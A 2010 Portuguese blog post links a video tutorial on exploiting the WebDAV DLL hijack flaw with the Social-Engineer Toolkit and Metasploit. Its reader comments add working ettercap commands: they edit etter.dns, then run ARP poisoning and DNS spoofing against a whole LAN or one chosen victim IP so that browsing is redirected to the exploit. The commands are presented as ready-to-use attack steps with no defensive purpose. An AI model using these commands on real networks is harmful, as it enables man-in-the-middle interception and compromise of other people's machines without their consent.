SET + Metasploit - WebDAV DLL hijacker

Posted: 12 setembro 2010 by Bhior in Marcadores: , ,
4

Nessa aula mostro com explorar WebDAV DLL hijack usando o SET integrado com Metasploit.


Sobre o Vídeo:
Formato:  AVI
Tamanho: 12.5 MB
Duração: 3:12 min
Musica: Toca uma regueira aí - Armandinho

Baixar: http://www.4shared.com/file/X6cJru8-/SET-DLL_Hijacker.html

Ref:
http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt

4 comentários:

  1. Anônimo says:

    Muito Bom bhior

    obs: para deixar na versão 0.6.1

    no menu do set aperte 8 que ele vai atualizar

    8. update the social-Engineer Toolkit

    Creditos BHIOR ...

    by user777

  1. Anônimo says:

    Boa galera como mostrado no video o nosso ilustre bhior digita o ip da maquina com backtrack no IE do windows...

    vejamos alguma dica para fazer esse tipo de teste... sem ter que digitar o ip na outra maquina..

    abra o arquivo com editor de texto preferido usei aqui o vi pode ser qualquer um


    vi /usr/share/ettercap/etter.dsn

    e adicione a seguinte linha

    * A ( seu ip )

    onde seu ip será o seu ip real

    então ficaria aqui no meu

    * A 192.168.0.10


    feito isso salve o arquivo e rode o ettercap em modo texto

    ettercap -Tq -M arp -o //

    demore uns 5 segundos e precione q

    depois execute

    ettercap -T -q -P dns_spoof -M arp //

    pronto quando for acessar alguma pagina da web vai direcionar para o exploit

    isso pessoal ja é rodando o set ...

  1. Anônimo says:

    Outra dica legal é especificando um ip da rede para ser redirecionado


    mesmo procedimento do anterior so que ficaria assim

    ettercap -T -q -P dns_spoof -M arp /ip/ //

    onde /ip/ é o ip da pessoa que você quer redirecionar ficaria assim

    ettercap -T -q -P dns_spoof -M arp /192.168.0.2/ //

    by user777

  1. Anônimo says:

    outra coisa bhior

    como reduzir a quantidade de arquivos quando abre a pasta com os arquivos

    no video se não me engano mostra apenas 3 , na pratica aqui abriu uns 10 ..

    no aguardo...

    By user777